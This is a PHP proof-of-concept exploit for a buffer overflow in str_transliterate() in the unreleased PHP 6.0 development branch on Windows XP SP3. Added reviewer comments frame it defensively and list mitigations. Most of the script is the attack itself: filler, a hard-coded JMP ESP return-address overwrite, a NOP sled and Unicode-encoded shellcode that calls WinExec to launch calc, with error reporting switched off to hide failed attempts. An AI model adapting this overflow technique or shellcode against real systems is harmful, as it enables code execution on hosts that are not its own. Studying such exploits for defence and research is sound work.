<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, 'unicode.semantics' has to be on!
## php.ini > unicode.semantics = on
#####################################################################
## Reviewer notes (defensive context):
## - This is a proof-of-concept against the unreleased PHP 6.0 development branch. The 'unicode.semantics'
##   switch and the "\uXXXX" string escapes it depends on never shipped; PHP 7+ writes code-point escapes
##   as "\u{XXXX}", so on released interpreters the strings below are literal backslash text and the script
##   either stops at the ini check or fails on the undefined str_transliterate() call.
## - The variables describe the classic overflow layout the page already names: filler ($buff), a
##   return-address overwrite ($eip, a hard-coded JMP ESP in php6ts.dll — so build- and locale-specific),
##   a NOP sled ($nops) and the payload ($shellcode). Non-randomised module bases and an executable stack
##   are what such a PoC relies on; DEP/NX and ASLR on the host, crash monitoring on the web worker, and
##   never deploying development snapshots of the interpreter are the mitigations.
## - error_reporting(0) suppresses the notices/warnings a failed attempt would otherwise emit; in a
##   production log pipeline that silence is itself worth alerting on.
## - ini_get_bool() is declared later in this file; PHP hoists unconditional top-level function
##   declarations, so the forward call below resolves.
if(ini_get_bool('unicode.semantics')) {
    # Filler: 256 copies of U+4141 (PoC-specific length).
    $buff = str_repeat("\u4141", 256);
    # Return-address overwrite (see header: hard-coded gadget address).
    $eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
    # NOP sled.
    $nops = str_repeat("\u9090", 20);
    # WinExec Calc XP SP3 HEB Unicode-encoded shellcode
    $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";
    # WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
    # $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";
    # Concatenate the pieces in overflow order and hand them to the vulnerable function
    # (second argument). No return value is inspected: a non-vulnerable build simply returns or errors.
    $exploit = $buff.$eip.$nops.$shellcode;
    str_transliterate(0, $exploit, 0);
} else {
    # Runtime string left as-is (message wording is the author's).
    exit("Error! 'unicode.semantics' has be on!\r\n");
}
/**
 * Interpret an ini setting as a boolean.
 *
 * Mirrors the common php.net helper: 'on'/'yes'/'true' read as true — except for
 * 'assert.active', where they read as false; 'stdout'/'stderr' read as true only
 * for 'display_errors'; anything else goes through an integer cast, so an unknown
 * option (ini_get() returns false) and values like '0' or '' yield false.
 *
 * @param string $a ini option name
 * @return bool
 */
function ini_get_bool($a)
{
    $raw = ini_get($a);
    // ini_get() returns false for an unknown option; the explicit cast mirrors
    // the coercion strtolower() would otherwise do in non-strict mode.
    $normalized = strtolower((string) $raw);

    if (in_array($normalized, ['on', 'yes', 'true'], true)) {
        // Deliberate quirk preserved from the original: 'assert.active' => false.
        return 'assert.active' !== $a;
    }

    if (in_array($normalized, ['stdout', 'stderr'], true)) {
        // These spellings are only meaningful (and truthy) for display_errors.
        return 'display_errors' === $a;
    }

    // Numeric fallback: '1' => true, '0' / '' / false => false.
    return (bool) (int) $raw;
}
?>